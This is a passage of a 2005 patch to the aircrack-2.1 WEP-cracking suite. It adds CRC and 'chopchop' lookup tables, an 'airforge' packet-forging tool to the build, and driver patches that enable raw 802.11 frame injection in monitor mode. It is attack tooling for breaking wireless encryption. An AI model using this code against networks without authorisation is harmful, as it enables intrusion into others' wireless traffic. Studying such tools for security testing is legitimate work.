1927diff -urN aircrack-2.1.orig/crctable.h aircrack-2.1/crctable.h
1928--- aircrack-2.1.orig/crctable.h 1970-01-01 01:00:00.000000000 +0100
1929+++ aircrack-2.1/crctable.h 2005-04-22 08:51:21.934064816 +0200
1930@@ -0,0 +1,108 @@
1931+#ifndef _CRCTABLE_H
1932+#define _CRCTABLE_H
1933+
1934+const unsigned long int crc_tbl[256] =
1935+{
1936+ 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
1937+ 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
1938+ 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
1939+ 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
1940+ 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
1941+ 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
1942+ 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
1943+ 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
1944+ 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
1945+ 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
1946+ 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
1947+ 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
1948+ 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
1949+ 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
1950+ 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
1951+ 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
1952+ 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
1953+ 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
1954+ 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
1955+ 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
1956+ 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
1957+ 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
1958+ 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
1959+ 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
1960+ 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
1961+ 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
1962+ 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
1963+ 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
1964+ 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
1965+ 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
1966+ 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
1967+ 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
1968+};
1969+
1970+const unsigned char crc_chop_tbl[256][4] =
1971+{
1972+ { 0x26,0x70,0x6A,0x0F }, { 0x67,0x76,0x1B,0xD4 }, { 0xE5,0x7A,0xF9,0x62 }, { 0xA4,0x7C,0x88,0xB9 },
1973+ { 0xA0,0x65,0x4C,0xD4 }, { 0xE1,0x63,0x3D,0x0F }, { 0x63,0x6F,0xDF,0xB9 }, { 0x22,0x69,0xAE,0x62 },
1974+ { 0x6B,0x5D,0x57,0x62 }, { 0x2A,0x5B,0x26,0xB9 }, { 0xA8,0x57,0xC4,0x0F }, { 0xE9,0x51,0xB5,0xD4 },
1975+ { 0xED,0x48,0x71,0xB9 }, { 0xAC,0x4E,0x00,0x62 }, { 0x2E,0x42,0xE2,0xD4 }, { 0x6F,0x44,0x93,0x0F },
1976+ { 0xBC,0x2A,0x10,0xD5 }, { 0xFD,0x2C,0x61,0x0E }, { 0x7F,0x20,0x83,0xB8 }, { 0x3E,0x26,0xF2,0x63 },
1977+ { 0x3A,0x3F,0x36,0x0E }, { 0x7B,0x39,0x47,0xD5 }, { 0xF9,0x35,0xA5,0x63 }, { 0xB8,0x33,0xD4,0xB8 },
1978+ { 0xF1,0x07,0x2D,0xB8 }, { 0xB0,0x01,0x5C,0x63 }, { 0x32,0x0D,0xBE,0xD5 }, { 0x73,0x0B,0xCF,0x0E },
1979+ { 0x77,0x12,0x0B,0x63 }, { 0x36,0x14,0x7A,0xB8 }, { 0xB4,0x18,0x98,0x0E }, { 0xF5,0x1E,0xE9,0xD5 },
1980+ { 0x53,0xC3,0xEF,0x60 }, { 0x12,0xC5,0x9E,0xBB }, { 0x90,0xC9,0x7C,0x0D }, { 0xD1,0xCF,0x0D,0xD6 },
1981+ { 0xD5,0xD6,0xC9,0xBB }, { 0x94,0xD0,0xB8,0x60 }, { 0x16,0xDC,0x5A,0xD6 }, { 0x57,0xDA,0x2B,0x0D },
1982+ { 0x1E,0xEE,0xD2,0x0D }, { 0x5F,0xE8,0xA3,0xD6 }, { 0xDD,0xE4,0x41,0x60 }, { 0x9C,0xE2,0x30,0xBB },
1983+ { 0x98,0xFB,0xF4,0xD6 }, { 0xD9,0xFD,0x85,0x0D }, { 0x5B,0xF1,0x67,0xBB }, { 0x1A,0xF7,0x16,0x60 },
1984+ { 0xC9,0x99,0x95,0xBA }, { 0x88,0x9F,0xE4,0x61 }, { 0x0A,0x93,0x06,0xD7 }, { 0x4B,0x95,0x77,0x0C },
1985+ { 0x4F,0x8C,0xB3,0x61 }, { 0x0E,0x8A,0xC2,0xBA }, { 0x8C,0x86,0x20,0x0C }, { 0xCD,0x80,0x51,0xD7 },
1986+ { 0x84,0xB4,0xA8,0xD7 }, { 0xC5,0xB2,0xD9,0x0C }, { 0x47,0xBE,0x3B,0xBA }, { 0x06,0xB8,0x4A,0x61 },
1987+ { 0x02,0xA1,0x8E,0x0C }, { 0x43,0xA7,0xFF,0xD7 }, { 0xC1,0xAB,0x1D,0x61 }, { 0x80,0xAD,0x6C,0xBA },
1988+ { 0xCC,0x16,0x61,0xD0 }, { 0x8D,0x10,0x10,0x0B }, { 0x0F,0x1C,0xF2,0xBD }, { 0x4E,0x1A,0x83,0x66 },
1989+ { 0x4A,0x03,0x47,0x0B }, { 0x0B,0x05,0x36,0xD0 }, { 0x89,0x09,0xD4,0x66 }, { 0xC8,0x0F,0xA5,0xBD },
1990+ { 0x81,0x3B,0x5C,0xBD }, { 0xC0,0x3D,0x2D,0x66 }, { 0x42,0x31,0xCF,0xD0 }, { 0x03,0x37,0xBE,0x0B },
1991+ { 0x07,0x2E,0x7A,0x66 }, { 0x46,0x28,0x0B,0xBD }, { 0xC4,0x24,0xE9,0x0B }, { 0x85,0x22,0x98,0xD0 },
1992+ { 0x56,0x4C,0x1B,0x0A }, { 0x17,0x4A,0x6A,0xD1 }, { 0x95,0x46,0x88,0x67 }, { 0xD4,0x40,0xF9,0xBC },
1993+ { 0xD0,0x59,0x3D,0xD1 }, { 0x91,0x5F,0x4C,0x0A }, { 0x13,0x53,0xAE,0xBC }, { 0x52,0x55,0xDF,0x67 },
1994+ { 0x1B,0x61,0x26,0x67 }, { 0x5A,0x67,0x57,0xBC }, { 0xD8,0x6B,0xB5,0x0A }, { 0x99,0x6D,0xC4,0xD1 },
1995+ { 0x9D,0x74,0x00,0xBC }, { 0xDC,0x72,0x71,0x67 }, { 0x5E,0x7E,0x93,0xD1 }, { 0x1F,0x78,0xE2,0x0A },
1996+ { 0xB9,0xA5,0xE4,0xBF }, { 0xF8,0xA3,0x95,0x64 }, { 0x7A,0xAF,0x77,0xD2 }, { 0x3B,0xA9,0x06,0x09 },
1997+ { 0x3F,0xB0,0xC2,0x64 }, { 0x7E,0xB6,0xB3,0xBF }, { 0xFC,0xBA,0x51,0x09 }, { 0xBD,0xBC,0x20,0xD2 },
1998+ { 0xF4,0x88,0xD9,0xD2 }, { 0xB5,0x8E,0xA8,0x09 }, { 0x37,0x82,0x4A,0xBF }, { 0x76,0x84,0x3B,0x64 },
1999+ { 0x72,0x9D,0xFF,0x09 }, { 0x33,0x9B,0x8E,0xD2 }, { 0xB1,0x97,0x6C,0x64 }, { 0xF0,0x91,0x1D,0xBF },
2000+ { 0x23,0xFF,0x9E,0x65 }, { 0x62,0xF9,0xEF,0xBE }, { 0xE0,0xF5,0x0D,0x08 }, { 0xA1,0xF3,0x7C,0xD3 },
2001+ { 0xA5,0xEA,0xB8,0xBE }, { 0xE4,0xEC,0xC9,0x65 }, { 0x66,0xE0,0x2B,0xD3 }, { 0x27,0xE6,0x5A,0x08 },
2002+ { 0x6E,0xD2,0xA3,0x08 }, { 0x2F,0xD4,0xD2,0xD3 }, { 0xAD,0xD8,0x30,0x65 }, { 0xEC,0xDE,0x41,0xBE },
2003+ { 0xE8,0xC7,0x85,0xD3 }, { 0xA9,0xC1,0xF4,0x08 }, { 0x2B,0xCD,0x16,0xBE }, { 0x6A,0xCB,0x67,0x65 },
2004+ { 0xB3,0xBB,0x0D,0x6A }, { 0xF2,0xBD,0x7C,0xB1 }, { 0x70,0xB1,0x9E,0x07 }, { 0x31,0xB7,0xEF,0xDC },
2005+ { 0x35,0xAE,0x2B,0xB1 }, { 0x74,0xA8,0x5A,0x6A }, { 0xF6,0xA4,0xB8,0xDC }, { 0xB7,0xA2,0xC9,0x07 },
2006+ { 0xFE,0x96,0x30,0x07 }, { 0xBF,0x90,0x41,0xDC }, { 0x3D,0x9C,0xA3,0x6A }, { 0x7C,0x9A,0xD2,0xB1 },
2007+ { 0x78,0x83,0x16,0xDC }, { 0x39,0x85,0x67,0x07 }, { 0xBB,0x89,0x85,0xB1 }, { 0xFA,0x8F,0xF4,0x6A },
2008+ { 0x29,0xE1,0x77,0xB0 }, { 0x68,0xE7,0x06,0x6B }, { 0xEA,0xEB,0xE4,0xDD }, { 0xAB,0xED,0x95,0x06 },
2009+ { 0xAF,0xF4,0x51,0x6B }, { 0xEE,0xF2,0x20,0xB0 }, { 0x6C,0xFE,0xC2,0x06 }, { 0x2D,0xF8,0xB3,0xDD },
2010+ { 0x64,0xCC,0x4A,0xDD }, { 0x25,0xCA,0x3B,0x06 }, { 0xA7,0xC6,0xD9,0xB0 }, { 0xE6,0xC0,0xA8,0x6B },
2011+ { 0xE2,0xD9,0x6C,0x06 }, { 0xA3,0xDF,0x1D,0xDD }, { 0x21,0xD3,0xFF,0x6B }, { 0x60,0xD5,0x8E,0xB0 },
2012+ { 0xC6,0x08,0x88,0x05 }, { 0x87,0x0E,0xF9,0xDE }, { 0x05,0x02,0x1B,0x68 }, { 0x44,0x04,0x6A,0xB3 },
2013+ { 0x40,0x1D,0xAE,0xDE }, { 0x01,0x1B,0xDF,0x05 }, { 0x83,0x17,0x3D,0xB3 }, { 0xC2,0x11,0x4C,0x68 },
2014+ { 0x8B,0x25,0xB5,0x68 }, { 0xCA,0x23,0xC4,0xB3 }, { 0x48,0x2F,0x26,0x05 }, { 0x09,0x29,0x57,0xDE },
2015+ { 0x0D,0x30,0x93,0xB3 }, { 0x4C,0x36,0xE2,0x68 }, { 0xCE,0x3A,0x00,0xDE }, { 0x8F,0x3C,0x71,0x05 },
2016+ { 0x5C,0x52,0xF2,0xDF }, { 0x1D,0x54,0x83,0x04 }, { 0x9F,0x58,0x61,0xB2 }, { 0xDE,0x5E,0x10,0x69 },
2017+ { 0xDA,0x47,0xD4,0x04 }, { 0x9B,0x41,0xA5,0xDF }, { 0x19,0x4D,0x47,0x69 }, { 0x58,0x4B,0x36,0xB2 },
2018+ { 0x11,0x7F,0xCF,0xB2 }, { 0x50,0x79,0xBE,0x69 }, { 0xD2,0x75,0x5C,0xDF }, { 0x93,0x73,0x2D,0x04 },
2019+ { 0x97,0x6A,0xE9,0x69 }, { 0xD6,0x6C,0x98,0xB2 }, { 0x54,0x60,0x7A,0x04 }, { 0x15,0x66,0x0B,0xDF },
2020+ { 0x59,0xDD,0x06,0xB5 }, { 0x18,0xDB,0x77,0x6E }, { 0x9A,0xD7,0x95,0xD8 }, { 0xDB,0xD1,0xE4,0x03 },
2021+ { 0xDF,0xC8,0x20,0x6E }, { 0x9E,0xCE,0x51,0xB5 }, { 0x1C,0xC2,0xB3,0x03 }, { 0x5D,0xC4,0xC2,0xD8 },
2022+ { 0x14,0xF0,0x3B,0xD8 }, { 0x55,0xF6,0x4A,0x03 }, { 0xD7,0xFA,0xA8,0xB5 }, { 0x96,0xFC,0xD9,0x6E },
2023+ { 0x92,0xE5,0x1D,0x03 }, { 0xD3,0xE3,0x6C,0xD8 }, { 0x51,0xEF,0x8E,0x6E }, { 0x10,0xE9,0xFF,0xB5 },
2024+ { 0xC3,0x87,0x7C,0x6F }, { 0x82,0x81,0x0D,0xB4 }, { 0x00,0x8D,0xEF,0x02 }, { 0x41,0x8B,0x9E,0xD9 },
2025+ { 0x45,0x92,0x5A,0xB4 }, { 0x04,0x94,0x2B,0x6F }, { 0x86,0x98,0xC9,0xD9 }, { 0xC7,0x9E,0xB8,0x02 },
2026+ { 0x8E,0xAA,0x41,0x02 }, { 0xCF,0xAC,0x30,0xD9 }, { 0x4D,0xA0,0xD2,0x6F }, { 0x0C,0xA6,0xA3,0xB4 },
2027+ { 0x08,0xBF,0x67,0xD9 }, { 0x49,0xB9,0x16,0x02 }, { 0xCB,0xB5,0xF4,0xB4 }, { 0x8A,0xB3,0x85,0x6F },
2028+ { 0x2C,0x6E,0x83,0xDA }, { 0x6D,0x68,0xF2,0x01 }, { 0xEF,0x64,0x10,0xB7 }, { 0xAE,0x62,0x61,0x6C },
2029+ { 0xAA,0x7B,0xA5,0x01 }, { 0xEB,0x7D,0xD4,0xDA }, { 0x69,0x71,0x36,0x6C }, { 0x28,0x77,0x47,0xB7 },
2030+ { 0x61,0x43,0xBE,0xB7 }, { 0x20,0x45,0xCF,0x6C }, { 0xA2,0x49,0x2D,0xDA }, { 0xE3,0x4F,0x5C,0x01 },
2031+ { 0xE7,0x56,0x98,0x6C }, { 0xA6,0x50,0xE9,0xB7 }, { 0x24,0x5C,0x0B,0x01 }, { 0x65,0x5A,0x7A,0xDA },
2032+ { 0xB6,0x34,0xF9,0x00 }, { 0xF7,0x32,0x88,0xDB }, { 0x75,0x3E,0x6A,0x6D }, { 0x34,0x38,0x1B,0xB6 },
2033+ { 0x30,0x21,0xDF,0xDB }, { 0x71,0x27,0xAE,0x00 }, { 0xF3,0x2B,0x4C,0xB6 }, { 0xB2,0x2D,0x3D,0x6D },
2034+ { 0xFB,0x19,0xC4,0x6D }, { 0xBA,0x1F,0xB5,0xB6 }, { 0x38,0x13,0x57,0x00 }, { 0x79,0x15,0x26,0xDB },
2035+ { 0x7D,0x0C,0xE2,0xB6 }, { 0x3C,0x0A,0x93,0x6D }, { 0xBE,0x06,0x71,0xDB }, { 0xFF,0x00,0x00,0x00 }
2036+};
2037+
2038+#endif /* crctable.h */
2039diff -urN aircrack-2.1.orig/Makefile aircrack-2.1/Makefile
2040--- aircrack-2.1.orig/Makefile 2004-10-01 21:30:00.000000000 +0200
2041+++ aircrack-2.1/Makefile 2005-04-22 08:53:15.398815552 +0200
2042@@ -7,13 +7,14 @@
2043 docdir = $(datadir)/aircrack
2044
2045 DESTDIR =
2046-BINFILES = 802ether aircrack aireplay airodump hopper.sh
2047+BINFILES = 802ether aircrack aireplay airodump airforge hopper.sh
2048 DOCFILES = ChangeLog rawsend.patch docs/aircrack.html
2049
2050 all:
2051 $(CC) $(CFLAGS) $(OPTFLAGS) 802ether.c -o 802ether
2052 $(CC) $(CFLAGS) $(OPTFLAGS) aircrack.c -o aircrack
2053 $(CC) $(CFLAGS) $(OPTFLAGS) aireplay.c -o aireplay
2054+ $(CC) $(CFLAGS) $(OPTFLAGS) airforge.c -o airforge
2055 $(CC) $(CFLAGS) $(OPTFLAGS) airodump.c -o airodump
2056
2057 install:
2058@@ -25,4 +26,4 @@
2059 install -m 644 $(DOCFILES) $(DESTDIR)$(docdir)
2060
2061 clean:
2062- rm -f *.o 802ether aircrack aireplay airodump
2063+ rm -f *.o 802ether aircrack aireplay airforge airodump
2064diff -urN aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1
2065--- aircrack-2.1.orig/patch/hostap-driver-0.3.7.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2066+++ aircrack-2.1/patch/hostap-driver-0.3.7.patch.0.1 2005-04-22 08:51:21.935064664 +0200
2067@@ -0,0 +1,12 @@
2068+diff -aur hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c
2069+--- hostap-driver-0.3.7-orig/driver/modules/hostap_80211_tx.c 2004-07-06 01:45:01.000000000 +0200
2070++++ hostap-driver-0.3.7/driver/modules/hostap_80211_tx.c 2005-03-14 13:53:20.000000000 +0100
2071+@@ -466,7 +466,7 @@
2072+ goto fail;
2073+ }
2074+
2075+- if (tx.crypt) {
2076++ if (tx.crypt && memcmp(tx.crypt->priv+4,"\x01\x02\x04\x08\x10",5)) {
2077+ skb = hostap_tx_encrypt(skb, tx.crypt);
2078+ if (skb == NULL) {
2079+ printk(KERN_DEBUG "%s: TX - encryption failed\n",
2080diff -urN aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1
2081--- aircrack-2.1.orig/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 1970-01-01 01:00:00.000000000 +0100
2082+++ aircrack-2.1/patch/linux-wlan-ng-0.2.1-pre26.patch.0.1 2005-04-22 08:51:21.936064512 +0200
2083@@ -0,0 +1,284 @@
2084+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c
2085+--- linux-wlan-ng-0.2.1-pre26-orig/src/p80211/p80211netdev.c 2005-01-11 18:43:54.000000000 +0100
2086++++ linux-wlan-ng-0.2.1-pre26/src/p80211/p80211netdev.c 2005-03-14 13:58:11.000000000 +0100
2087+@@ -525,7 +525,7 @@
2088+ * and return success .
2089+ * TODO: we need a saner way to handle this
2090+ */
2091+- if(skb->protocol != ETH_P_80211_RAW) {
2092++ if(skb->protocol != htons(ETH_P_80211_RAW)) {
2093+ p80211netdev_start_queue(wlandev);
2094+ WLAN_LOG_NOTICE(
2095+ "Tx attempt prior to association, frame dropped.\n");
2096+@@ -537,7 +537,7 @@
2097+ }
2098+
2099+ /* Check for raw transmits */
2100+- if(skb->protocol == ETH_P_80211_RAW) {
2101++ if(skb->protocol == htons(ETH_P_80211_RAW)) {
2102+ if (!capable(CAP_NET_ADMIN)) {
2103+ return(-EPERM);
2104+ }
2105+@@ -965,8 +965,9 @@
2106+ dev->set_mac_address = p80211knetdev_set_mac_address;
2107+ #endif
2108+ #ifdef HAVE_TX_TIMEOUT
2109+- dev->tx_timeout = &p80211knetdev_tx_timeout;
2110+- dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
2111++// KoreK: still not implemented
2112++// dev->tx_timeout = &p80211knetdev_tx_timeout;
2113++// dev->watchdog_timeo = (wlan_watchdog * HZ) / 1000;
2114+ #endif
2115+
2116+ }
2117+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile
2118+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/Makefile 2005-01-25 02:41:44.000000000 +0100
2119++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/Makefile 2005-03-14 13:58:11.000000000 +0100
2120+@@ -88,7 +88,7 @@
2121+ MODVERDIR=$(WLAN_SRC)/.tmp_versions modules
2122+ else # kbuild 2.4
2123+
2124+- $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(PWD) \
2125++ $(MAKE) -C $(LINUX_SRC) SUBDIRS=$(PWD) WLAN_SRC=$(WLAN_SRC) \
2126+ modules
2127+
2128+ endif # kbuild switch
2129+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c
2130+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x.c 2005-01-25 01:38:50.000000000 +0100
2131++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x.c 2005-03-14 15:21:02.000000000 +0100
2132+@@ -1941,8 +1941,14 @@
2133+
2134+ DBFENTER;
2135+
2136+- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2137+- HFA384x_CMD_AINFO_SET(enable);
2138++ if (enable == HFA384x_MONITOR_ENABLE) {
2139++ // KoreK: get into test mode 0x0a
2140++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2141++ HFA384x_CMD_AINFO_SET(0x0a);
2142++ } else {
2143++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2144++ HFA384x_CMD_AINFO_SET(enable);
2145++ }
2146+ cmd.parm0 = 0;
2147+ cmd.parm1 = 0;
2148+ cmd.parm2 = 0;
2149+@@ -3178,13 +3184,26 @@
2150+ HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
2151+ #endif
2152+
2153+- /* if we're using host WEP, increase size by IV+ICV */
2154+- if (p80211_wep->data) {
2155+- txdesc.data_len = host2hfa384x_16(skb->len+8);
2156+- // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2157+- } else {
2158+- txdesc.data_len = host2hfa384x_16(skb->len);
2159+- }
2160++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
2161++ /* if we're using host WEP, increase size by IV+ICV */
2162++ if (p80211_wep->data) {
2163++ txdesc.data_len = host2hfa384x_16(skb->len+8);
2164++ // txdesc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2165++ } else {
2166++ txdesc.data_len = host2hfa384x_16(skb->len);
2167++ }
2168++ } else {
2169++ /* KoreK: raw injection (monitor mode): pull the rest of
2170++ the header and ssanity check on txdesc.data_len */
2171++ memcpy(&(txdesc.data_len), skb->data, 16);
2172++ skb_pull(skb,16);
2173++ if (txdesc.data_len != host2hfa384x_16(skb->len)) {
2174++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
2175++ return 0;
2176++ }
2177++
2178++ txdesc.tx_control |= HFA384x_TX_RETRYSTRAT_SET(1);
2179++ }
2180+
2181+ txdesc.tx_control = host2hfa384x_16(txdesc.tx_control);
2182+ /* copy the header over to the txdesc */
2183+@@ -3207,7 +3226,7 @@
2184+ spin_lock(&hw->cmdlock);
2185+
2186+ /* Copy descriptor+payload to FID */
2187+- if (p80211_wep->data) {
2188++ if (p80211_wep->data && (skb->protocol != htons(ETH_P_80211_RAW))) {
2189+ result = hfa384x_copy_to_bap4(hw, HFA384x_BAP_PROC, fid, 0,
2190+ &txdesc, sizeof(txdesc),
2191+ p80211_wep->iv, sizeof(p80211_wep->iv),
2192+@@ -3657,6 +3676,16 @@
2193+ switch( HFA384x_RXSTATUS_MACPORT_GET(rxdesc.status) )
2194+ {
2195+ case 0:
2196++ /* KoreK: this testmode uses macport 0 */
2197++ if ((wlandev->netdev->type == ARPHRD_IEEE80211) ||
2198++ (wlandev->netdev->type == ARPHRD_IEEE80211_PRISM)) {
2199++ if ( ! HFA384x_RXSTATUS_ISFCSERR(rxdesc.status) ) {
2200++ hfa384x_int_rxmonitor( wlandev, rxfid, &rxdesc);
2201++ } else {
2202++ WLAN_LOG_DEBUG(3,"Received monitor frame: FCSerr set\n");
2203++ }
2204++ goto done;
2205++ }
2206+
2207+ fc = ieee2host16(rxdesc.frame_control);
2208+
2209+diff -aur linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c
2210+--- linux-wlan-ng-0.2.1-pre26-orig/src/prism2/driver/hfa384x_usb.c 2005-01-17 17:24:40.000000000 +0100
2211++++ linux-wlan-ng-0.2.1-pre26/src/prism2/driver/hfa384x_usb.c 2005-03-14 15:27:57.000000000 +0100
2212+@@ -1143,8 +1143,14 @@
2213+
2214+ DBFENTER;
2215+
2216+- cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2217+- HFA384x_CMD_AINFO_SET(enable);
2218++ if (enable == HFA384x_MONITOR_ENABLE) {
2219++ // KoreK: get into test mode 0x0a
2220++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2221++ HFA384x_CMD_AINFO_SET(0x0a);
2222++ } else {
2223++ cmd.cmd = HFA384x_CMD_CMDCODE_SET(HFA384x_CMDCODE_MONITOR) |
2224++ HFA384x_CMD_AINFO_SET(enable);
2225++ }
2226+ cmd.parm0 = 0;
2227+ cmd.parm1 = 0;
2228+ cmd.parm2 = 0;
2229+@@ -3258,37 +3264,59 @@
2230+ HFA384x_TX_MACPORT_SET(0) | HFA384x_TX_STRUCTYPE_SET(1) |
2231+ HFA384x_TX_TXEX_SET(0) | HFA384x_TX_TXOK_SET(0);
2232+ #endif
2233+- hw->txbuff.txfrm.desc.tx_control =
2234+- host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
2235+
2236+- /* copy the header over to the txdesc */
2237+- memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr, sizeof(p80211_hdr_t));
2238++ if (skb->protocol != htons(ETH_P_80211_RAW)) {
2239++ hw->txbuff.txfrm.desc.tx_control =
2240++ host2hfa384x_16(hw->txbuff.txfrm.desc.tx_control);
2241++
2242++ /* copy the header over to the txdesc */
2243++ memcpy(&(hw->txbuff.txfrm.desc.frame_control), p80211_hdr,
2244++ sizeof(p80211_hdr_t));
2245++
2246++ /* if we're using host WEP, increase size by IV+ICV */
2247++ if (p80211_wep->data) {
2248++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
2249++ // hw->txbuff.txfrm.desc.tx_control |= HFA384x_TX_NOENCRYPT_SET(1);
2250++ usbpktlen+=8;
2251++ } else {
2252++ hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len);
2253++ }
2254++ } else {
2255++ /* KoreK: raw injection (monitor mode): pull the rest of
2256++ the header and ssanity check on txdesc.data_len */
2257++ memcpy(&(hw->txbuff.txfrm.desc.data_len), skb->data, 16);
2258++ skb_pull(skb,16);
2259++ if (hw->txbuff.txfrm.desc.data_len != host2hfa384x_16(skb->len)) {
2260++ printk(KERN_DEBUG "mismatch frame_len, drop frame\n");
2261++ return 0;
2262++ }
2263+
2264+- /* if we're using host WEP, increase size by IV+ICV */
2265+- if (p80211_wep->data) {
2266+- hw->txbuff.txfrm.desc.data_len = host2hfa384x_16(skb->len+8);
